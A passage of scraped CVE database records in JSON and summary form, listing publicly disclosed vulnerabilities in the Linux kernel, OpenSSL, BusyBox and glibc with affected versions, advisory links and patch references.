"CWE-401 Memory Leak", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-10-20T14:02:42.617Z", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "tags": [ "vdb-entry", "technical-description" ], "url": "https://vuldb.com/?id.211930" }, { "tags": [ "signature", "permissions-required" ], "url": "https://vuldb.com/?ctiid.211930" }, { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=7e97cfed9929eaabc41829c395eb0d1350fccb9d" } ], "timeline": [ { "lang": "en", "time": "2022-10-21T00:00:00.000Z", "value": "Advisory disclosed" }, { "lang": "en", "time": "2022-10-21T00:00:00.000Z", "value": "CVE reserved" }, { "lang": "en", "time": "2022-10-21T02:00:00.000Z", "value": "VulDB entry created" }, { "lang": "en", "time": "2023-01-03T12:44:50.000Z", "value": "VulDB entry last update" } ], "title": "Linux Kernel af_vsock.c vsock_connect memory leak" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3629", "datePublished": "2022-10-21T00:00:00", "dateReserved": "2022-10-21T00:00:00", "dateUpdated": "2024-08-03T01:14:02.789Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-0465
Vulnerability from cvelistv5
Published
2023-03-28 14:30
Modified
2024-08-02 05:10
Severity ?
EPSS score ?
Summary
Applications that use a non-default option when verifying certificates may be
vulnerable to an attack from a malicious CA to circumvent certain checks.
Invalid certificate policies in leaf certificates are silently ignored by
OpenSSL and other certificate policy checks are skipped for that certificate.
A malicious CA could use this to deliberately assert invalid certificate policies
in order to circumvent policy checking on the certificate altogether.
Policy processing is disabled by default but can be enabled by passing
the `-policy' argument to the command line utilities or by calling the
`X509_VERIFY_PARAM_set1_policies()' function.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:10:56.368Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20230328.txt" }, { "name": "3.1.1 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c" }, { "name": "3.0.9 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb" }, { "name": "1.1.1u git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95" }, { "name": "1.0.2zh patch (premium)", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230414-0001/" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5417" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" }, { "tags": [ "x_transferred" ], "url": "https://security.gentoo.org/glsa/202402-08" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.1.1", "status": "affected", "version": "3.1.0", "versionType": "semver" }, { "lessThan": "3.0.9", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "1.1.1u", "status": "affected", "version": "1.1.1", "versionType": "custom" }, { "lessThan": "1.0.2zh", "status": "affected", "version": "1.0.2", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "reporter", "user": "00000000-0000-4000-9000-000000000000", "value": "David Benjamin (Google)" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Matt Caswell" } ], "datePublic": "2023-03-23T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Applications that use a non-default option when verifying certificates may be\u003cbr\u003evulnerable to an attack from a malicious CA to circumvent certain checks.\u003cbr\u003e\u003cbr\u003eInvalid certificate policies in leaf certificates are silently ignored by\u003cbr\u003eOpenSSL and other certificate policy checks are skipped for that certificate.\u003cbr\u003eA malicious CA could use this to deliberately assert invalid certificate policies\u003cbr\u003ein order to circumvent policy checking on the certificate altogether.\u003cbr\u003e\u003cbr\u003ePolicy processing is disabled by default but can be enabled by passing\u003cbr\u003ethe `-policy\u0027 argument to the command line utilities or by calling the\u003cbr\u003e`X509_VERIFY_PARAM_set1_policies()\u0027 function." } ], "value": "Applications that use a non-default option when verifying certificates may be\nvulnerable to an attack from a malicious CA to circumvent certain checks.\n\nInvalid certificate policies in leaf certificates are silently ignored by\nOpenSSL and other certificate policy checks are skipped for that certificate.\nA malicious CA could use this to deliberately assert invalid certificate policies\nin order to circumvent policy checking on the certificate altogether.\n\nPolicy processing is disabled by default but can be enabled by passing\nthe `-policy\u0027 argument to the command line utilities or by calling the\n`X509_VERIFY_PARAM_set1_policies()\u0027 function." } ], "metrics": [ { "format": "other", "other": { "content": { "text": "Low" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "description": "improper certificate validation", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-28T14:30:39.707Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20230328.txt" }, { "name": "3.1.1 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c" }, { "name": "3.0.9 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb" }, { "name": "1.1.1u git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95" }, { "name": "1.0.2zh patch (premium)", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a" }, { "url": "https://security.netapp.com/advisory/ntap-20230414-0001/" }, { "url": "https://www.debian.org/security/2023/dsa-5417" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" }, { "url": "https://security.gentoo.org/glsa/202402-08" } ], "source": { "discovery": "UNKNOWN" }, "title": "Invalid certificate policies in leaf certificates are silently ignored", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2023-0465", "datePublished": "2023-03-28T14:30:39.707Z", "dateReserved": "2023-01-24T13:51:42.650Z", "dateUpdated": "2024-08-02T05:10:56.368Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-23559
Vulnerability from cvelistv5
Published
2023-01-13 00:00
Modified
2024-08-02 10:35
Severity ?
EPSS score ?
Summary
In rndis_query_oid in drivers/net/wireless/rndis_wlan.c in the Linux kernel through 6.1.5, there is an integer overflow in an addition.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T10:35:33.175Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://patchwork.kernel.org/project/linux-wireless/patch/20230110173007.57110-1-szymon.heidrich%40gmail.com/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230302-0003/" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b870e73a56c4cccbec33224233eaf295839f228c" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In rndis_query_oid in drivers/net/wireless/rndis_wlan.c in the Linux kernel through 6.1.5, there is an integer overflow in an addition." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:41:20.856168", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://patchwork.kernel.org/project/linux-wireless/patch/20230110173007.57110-1-szymon.heidrich%40gmail.com/" }, { "url": "https://security.netapp.com/advisory/ntap-20230302-0003/" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b870e73a56c4cccbec33224233eaf295839f228c" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-23559", "datePublished": "2023-01-13T00:00:00", "dateReserved": "2023-01-13T00:00:00", "dateUpdated": "2024-08-02T10:35:33.175Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42376
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
A NULL pointer dereference in Busybox's hush applet leads to denial of service when processing a crafted shell command, due to missing validation after a \x03 delimiter character. This may be used for DoS under very rare conditions of filtered command input.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.515Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A NULL pointer dereference in Busybox\u0027s hush applet leads to denial of service when processing a crafted shell command, due to missing validation after a \\x03 delimiter character. This may be used for DoS under very rare conditions of filtered command input." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42376", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.515Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-41674
Vulnerability from cvelistv5
Published
2022-10-13 00:00
Modified
2024-08-03 12:49
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel before 5.19.16. Attackers able to inject WLAN frames could cause a buffer overflow in the ieee80211_bss_info_update function in net/mac80211/scan.c.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:49:43.598Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1203770" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/log/net/mac80211/scan.c" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/10/13/2" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/10/13/5" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/wireless/wireless.git/commit/?id=aebe9f4639b13a1f4e9a6b42cdd2e38c617b442d" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/169951/Kernel-Live-Patch-Security-Notice-LSN-0090-1.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel before 5.19.16. Attackers able to inject WLAN frames could cause a buffer overflow in the ieee80211_bss_info_update function in net/mac80211/scan.c." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-21T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1203770" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/log/net/mac80211/scan.c" }, { "url": "http://www.openwall.com/lists/oss-security/2022/10/13/2" }, { "url": "https://www.openwall.com/lists/oss-security/2022/10/13/5" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/wireless/wireless.git/commit/?id=aebe9f4639b13a1f4e9a6b42cdd2e38c617b442d" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "url": "http://packetstormsecurity.com/files/169951/Kernel-Live-Patch-Security-Notice-LSN-0090-1.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-41674", "datePublished": "2022-10-13T00:00:00", "dateReserved": "2022-09-28T00:00:00", "dateUpdated": "2024-08-03T12:49:43.598Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-3998
Vulnerability from cvelistv5
Published
2022-08-24 00:00
Modified
2024-08-03 17:16
Severity ?
EPSS score ?
Summary
A flaw was found in glibc. The realpath() function can mistakenly return an unexpected value, potentially leading to information leakage and disclosure of sensitive data.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T17:16:03.378Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/01/24/4" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28770" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=ee8d5e33adb284601c00c94687bc907e10aec9bb" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=84d2d0fe20bdf94feed82b21b4d7d136db471f03" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024633" }, { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2021-3998" }, { "tags": [ "x_transferred" ], "url": "https://security-tracker.debian.org/tracker/CVE-2021-3998" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20221020-0003/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "glibc", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Affects glibc v2.33 and above." } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in glibc. The realpath() function can mistakenly return an unexpected value, potentially leading to information leakage and disclosure of sensitive data." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "CWE-125 - Out-of-bounds Read", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-20T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://www.openwall.com/lists/oss-security/2022/01/24/4" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28770" }, { "url": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=ee8d5e33adb284601c00c94687bc907e10aec9bb" }, { "url": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=84d2d0fe20bdf94feed82b21b4d7d136db471f03" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024633" }, { "url": "https://access.redhat.com/security/cve/CVE-2021-3998" }, { "url": "https://security-tracker.debian.org/tracker/CVE-2021-3998" }, { "url": "https://security.netapp.com/advisory/ntap-20221020-0003/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2021-3998", "datePublished": "2022-08-24T00:00:00", "dateReserved": "2021-11-22T00:00:00", "dateUpdated": "2024-08-03T17:16:03.378Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-40307
Vulnerability from cvelistv5
Published
2022-09-09 00:00
Modified
2024-08-03 12:14
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel through 5.19.8. drivers/firmware/efi/capsule-loader.c has a race condition with a resultant use-after-free.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:14:40.052Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/9cb636b5f6a8cc6d1b50809ec8f8d33ae0c84c95" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel through 5.19.8. drivers/firmware/efi/capsule-loader.c has a race condition with a resultant use-after-free." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/9cb636b5f6a8cc6d1b50809ec8f8d33ae0c84c95" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-40307", "datePublished": "2022-09-09T00:00:00", "dateReserved": "2022-09-09T00:00:00", "dateUpdated": "2024-08-03T12:14:40.052Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-4662
Vulnerability from cvelistv5
Published
2022-12-22 00:00
Modified
2024-08-03 01:48
Severity ?
EPSS score ?
Summary
A flaw incorrect access control in the Linux kernel USB core subsystem was found in the way user attaches usb device. A local user could use this flaw to crash the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:48:39.476Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/CAB7eexLLApHJwZfMQ=X-PtRhw0BgO+5KcSMS05FNUYejJXqtSA%40mail.gmail.com/" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/20220913140355.910732567%40linuxfoundation.org/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 6.0-rc4" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw incorrect access control in the Linux kernel USB core subsystem was found in the way user attaches usb device. A local user could use this flaw to crash the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-455", "description": "CWE-455", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-22T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/all/CAB7eexLLApHJwZfMQ=X-PtRhw0BgO+5KcSMS05FNUYejJXqtSA%40mail.gmail.com/" }, { "url": "https://lore.kernel.org/all/20220913140355.910732567%40linuxfoundation.org/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-4662", "datePublished": "2022-12-22T00:00:00", "dateReserved": "2022-12-22T00:00:00", "dateUpdated": "2024-08-03T01:48:39.476Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-20422
Vulnerability from cvelistv5
Published
2022-10-11 00:00
Modified
2024-08-03 02:10
Severity ?
EPSS score ?
Summary
In emulation_proc_handler of armv8_deprecated.c, there is a possible way to corrupt memory due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-237540956References: Upstream kernel
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T02:10:44.661Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://source.android.com/security/bulletin/2022-10-01" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Android", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Android kernel" } ] } ], "descriptions": [ { "lang": "en", "value": "In emulation_proc_handler of armv8_deprecated.c, there is a possible way to corrupt memory due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-237540956References: Upstream kernel" } ], "problemTypes": [ { "descriptions": [ { "description": "Elevation of privilege", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6", "shortName": "google_android" }, "references": [ { "url": "https://source.android.com/security/bulletin/2022-10-01" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6", "assignerShortName": "google_android", "cveId": "CVE-2022-20422", "datePublished": "2022-10-11T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-03T02:10:44.661Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-13405
Vulnerability from cvelistv5
Published
2018-07-06 14:00
Modified
2024-08-05 09:00
Severity ?
EPSS score ?
Summary
The inode_init_owner function in fs/inode.c in the Linux kernel through 3.16 allows local users to create files with an unintended group ownership, in a scenario where a directory is SGID to a certain group and is writable by a user who is not a member of that group. Here, the non-member can trigger creation of a plain file whose group ownership is that group. The intended behavior was that the non-member can trigger creation of a directory (but not a plain file) whose group ownership is that group. The non-member can escalate privileges by making the plain file executable and SGID.
References
